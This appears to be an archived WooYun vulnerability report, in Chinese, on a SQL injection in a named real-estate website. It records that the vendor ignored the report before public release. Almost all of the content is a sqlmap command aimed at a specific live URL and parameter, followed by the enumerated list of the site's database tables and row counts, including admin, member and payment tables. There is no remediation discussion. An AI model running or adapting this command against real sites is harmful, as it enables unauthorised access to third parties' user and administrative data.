乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-07: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入点:[root@Hacker~]# Sqlmap -u "http://cs.funxoo.com/eshouselist.php?catid=78&posids=13&p= posids=13" -D fx_newwebsite_cs --count --tables
表
Database: fx_newwebsite_cs+-----------------------+---------+| Table | Entries |+-----------------------+---------+| fx_log | 47225 || fx_search | 39041 || fx_content_tag | 30978 || fx_hits | 28850 || fx_attachment | 28041 || fx_content_position | 13822 || fx_pay_exchange | 10332 || fx_ads_stat | 5830 || fx_keyword | 5519 || fx_content | 2263 || fx_content_count | 2187 || fx_c_news | 1912 || fx_spider_urls | 1740 || fx_admin_role_priv | 1688 || fx_c_house | 1621 || fx_member | 1521 || fx_member_cache | 1521 || fx_member_info | 1520 || fx_space | 1515 || fx_member_detail | 932 || fx_member_group_priv | 920 || fx_keylink | 530 || fx_menu | 529 || fx_c_zt | 515 || fx_copyfrom | 479 || fx_model_field | 450 || fx_member_agent | 411 || fx_cache_count | 338 || fx_mood_data | 316 || fx_digg_log | 307 || fx_author | 286 || fx_digg | 244 || fx_c_video | 198 || fx_category | 193 || fx_member_companys | 137 || fx_pay_stat | 125 || fx_ask_posts | 110 || fx_c_picture | 86 || fx_ads | 77 || fx_ask | 68 || fx_type | 57 || fx_editor_data | 53 || fx_comment | 52 || fx_c_eshouse | 45 || fx_spider_job | 45 || fx_ads_place | 43 || fx_ask_credit | 36 || fx_urlrule | 29 || fx_position | 26 || fx_ask_actor | 25 || fx_link | 22 || fx_module | 22 || fx_form_tuangou | 21 || fx_process_status | 21 || fx_block | 20 || fx_c_czhouse | 19 || fx_admin_role | 18 || fx_mail_email | 18 || fx_model | 18 || fx_admin | 14 || fx_area | 13 || fx_mail_email_type | 12 || fx_mail | 11 || fx_message | 11 || fx_formguide_fields | 10 || fx_vote_option | 9 || fx_special_content | 8 || fx_member_group | 7 || fx_status | 7 || fx_role | 6 || fx_search_type | 6 || fx_player | 5 || fx_spider_sites | 5 || fx_member_company | 4 || fx_times | 4 || fx_yp_stats | 4 || fx_session | 3 || fx_space_api | 3 || fx_special | 3 || fx_vote_subject | 3 || fx_yp_count | 3 || fx_error_report | 2 || fx_pay_pointcard_type | 2 || fx_ask_vote | 1 || fx_formguide | 1 || fx_mood | 1 || fx_process | 1 || fx_vote_useroption | 1 || fx_workflow | 1 |+-----------------------+---------+
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)